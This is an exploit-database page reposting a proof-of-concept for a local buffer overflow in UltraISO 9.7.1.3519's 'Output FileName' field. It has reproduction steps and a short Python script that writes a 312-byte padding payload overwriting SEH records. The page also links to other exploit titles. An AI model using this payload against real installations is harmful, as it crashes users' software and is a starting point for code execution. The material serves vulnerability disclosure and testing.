首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
UltraISO 9.7.1.3519 Output FileName Denial Of Service
来源:vfocus.net 作者:Ramirez 发布时间:2018-12-17  
# Exploit Title: UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) and Pointer to next SEH and SE handler records overwrite
# Discovery by: Francisco Ramirez
# Discovery Date: 2018-12-14
# Vendor Homepage: https://www.ultraiso.com/
# Software Link : https://www.ultraiso.com/download.html
# Tested Version: 9.7.1.3519
# Tested on: Windows 10 Pro - 64 bit
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
 
# Steps to Produce the Crash: 
# 1.- Run python code : python UltraISO_9.7.1.3519.py
# 2.- Open UltraISO_9.7.1.3519.txt and copy content to clipboard
# 3.- Open UltraISO_9.7.1.3519
# 4.- In the Window select 'Tools' > 'Make CD/DVD Image' 
# 5.- In the field  'Output FileName' remove the default path.
# 6.- Paste the content of UltraISO_9.7.1.3519.txt into the field: 'Output FileName'
# 7.- Click 'Make' and you will see a crash.
 
#!/usr/bin/env python
  
a_letters = "\x41" * 304
seRecord = "\x42" * 4
sehRecord = "\x43" * 4
buffer = a_letters + seRecord + sehRecord
f = open ("UltraISO_9.7.1.3519.txt", "w")
f.write(buffer)
f.close()
            


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Safari Proxy Object Type Confu
·Cisco RV110W Password Disclosu
·Windows UAC Protection Bypass
·Zortam MP3 Media Studio 24.15
·Angry IP Scanner 3.5.3 Denial
·WebDAV Server Serving DLL
·Huawei Router HG532e Command E
·WordPress Snap Creek Duplicato
·Windows Persistent Service Ins
·PrestaShop 1.6.x / 1.7.x Remot
·Nsauditor 3.0.28.0 Buffer Over
·SmartFTP Client 9.0.2623.0 Den
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved